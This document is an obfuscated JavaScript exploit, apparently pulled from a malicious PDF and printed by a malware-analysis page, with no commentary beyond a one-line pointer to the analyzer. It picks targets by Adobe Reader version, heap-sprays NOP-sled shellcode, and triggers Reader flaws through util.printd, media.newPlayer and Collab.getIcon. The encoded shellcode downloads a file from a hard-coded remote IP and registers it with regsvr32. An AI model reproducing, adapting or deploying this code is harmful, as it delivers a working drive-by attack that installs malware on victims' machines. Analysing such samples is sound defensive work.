var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('
');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.